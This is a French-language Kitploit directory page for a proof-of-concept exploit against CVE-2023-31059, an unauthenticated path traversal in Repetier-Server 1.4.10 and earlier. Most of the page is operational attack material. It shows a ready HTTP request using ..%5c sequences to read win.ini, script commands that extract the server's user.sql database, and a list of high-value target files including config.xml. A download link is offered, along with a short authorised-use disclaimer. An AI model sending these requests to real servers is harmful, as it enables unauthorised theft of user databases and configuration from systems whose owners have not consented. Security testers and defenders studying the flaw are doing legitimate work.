Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-31059-Repetier-Server-1.4.10-Unauthenticated-Path-Traversal | Kitploit
Outils/GitHubGitHub/mbanyamer/cve-2023-31059-repetier-server-1.4.10-unauthenticated-path-traversal
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionApprentissage et Éducation
GitHubmbanyamer/cve-2023-31059-repetier-server-1.4.10-unauthenticated-path-traversal

CVE-2023-31059-Repetier-Server-1.4.10-Unauthenticated-Path-Traversal

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 6 moisPas encore vérifié

Repetier-Server <= 1.4.10

Auteur : Mohammed Idrees Banyamer
Rôle : Chercheur en sécurité
Pays : Jordanie 🇯🇴


Aperçu

Preuve de concept d'exploitation pour une vulnérabilité de traversée de chemin / LFI non authentifiée à distance dans Repetier‑Server ≤ 1.4.10.

La vulnérabilité permet la lecture arbitraire de fichiers via des séquences ..%5c forgées dans le point de terminaison connectionLost.php.


Détails de la vulnérabilité

ChampValeur
ProduitRepetier‑Server
Affecté≤ 1.4.10
CVECVE‑2023‑31059
TypePath Traversal / LFI
AuthentificationAucune
VecteurRéseau
ImpactLecture arbitraire de fichiers
CVSS9.8 Critique

Flux d'attaque du PoC

root@kitploit:~
flowchart LR
    A[Attacker] -->|HTTP request with ..%5c traversal| B[Repetier Server]
    B --> C[base/connectionLost.php]
    C -->|Unsanitized file parameter| D[Windows Filesystem]
    D --> E[Sensitive File]
    E --> B
    B -->|File contents in HTTP response| A

Exemple d'exploitation

root@kitploit:~
GET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344

Utilisation

root@kitploit:~
# Test vulnerability
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test

# Extract user database
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
  --file "ProgramData\\Repetier-Server\\database\\user.sql" \
  --depth 20

Prérequis

root@kitploit:~
pip install requests

Cibles à haute valeur

root@kitploit:~
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts

Avertissement

Ce PoC est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite de test.


Contact

GitHub : https://github.com/mbanyamer

Télécharger l’outil